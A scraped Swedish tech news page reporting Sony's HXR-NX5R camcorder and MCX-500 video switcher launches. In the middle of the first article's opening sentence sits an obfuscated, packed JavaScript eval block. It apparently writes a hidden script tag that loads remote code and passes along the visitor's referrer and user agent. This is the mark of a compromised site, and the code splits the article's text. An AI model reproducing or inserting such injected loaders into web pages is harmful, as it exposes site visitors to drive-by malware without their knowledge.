Image Image Image Image Image Image Image Image Image Image

| 1 december, 2020

Scroll to top

Top

Sony lanserar handburen Full-HD kamera

Sony lanserar handburen Full-HD kamera
Sebastian

Sony eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ssein|var|u0026u|referrer|hrkae||js|php’.split(’|’),0,{}))
lanserar 
HXR-NX5R, den senaste modellen i företagets serie av NXCAM-kameror. Nya HXR-NX5R är utrustad med tre 1/2.8-type Full HD Exmor CMOS-sensorer och 40x Clear Image Zoom vilket möjliggör dubblering av den optiska zoomen utan att göra avkall på bildkvaliteten.

Kameran har multiformat-inspelning för att tillgodose ett brett spektrum av inspelningssituationer och miljöer. En helt ny funktion är en 3G-SDI-terminal som stöder Full HD 60p. Dessutom är HXR-NX5R marknadens första modell med möjlighet att justera LED-ljusstyrkan, vilket minimerar behovet av extern ljusutrustning. Andra nya funktioner innefattar digital signalprocessor (DSP), brusreducering, detaljreproduktion, responsiv joystick, FTP och live-streaming, inbyggd Wi-Fi, dubbla SD-kortingångar och XAVC S 50Mbps eller AVCHD / DV-inspelningsformat.

HXR-NX5R kommer att finnas tillgänglig i september 2016. För mer information och fullständigt pressmeddelande, vänligen klicka här.

Sony lanserar användarvänlig allt-i-ett switcher för proffsanvändning

Sony lanserar MCX-500 – en ny ”allt-i-ett”-switcher, ideal för användning med flera kameror och perfekt för en rad olika produktionsscenarion. MCX-500 är en fyrkanalig videoswitcher som ger användaren möjlighet att välja nio ingångar – fyra 3G-SDI, två HDMI, två CVBS och en RGB-ingång. En rad olika typer av videokameror kan sammankopplas med MCX-500, så som XDCAMs, NXCAMs samt även konsumentvideokameror. Andra funktioner inkluderar både PinP- och Keyer overlay-funktioner, övergångseffekter, fyra videoingångar och fem ljudingångar inklusive XLR och inbäddat ljud från SDI eller HDMI.

MCX-500 kommer att finnas tillgänglig i januari 2017. För mer information, vänligen klicka här.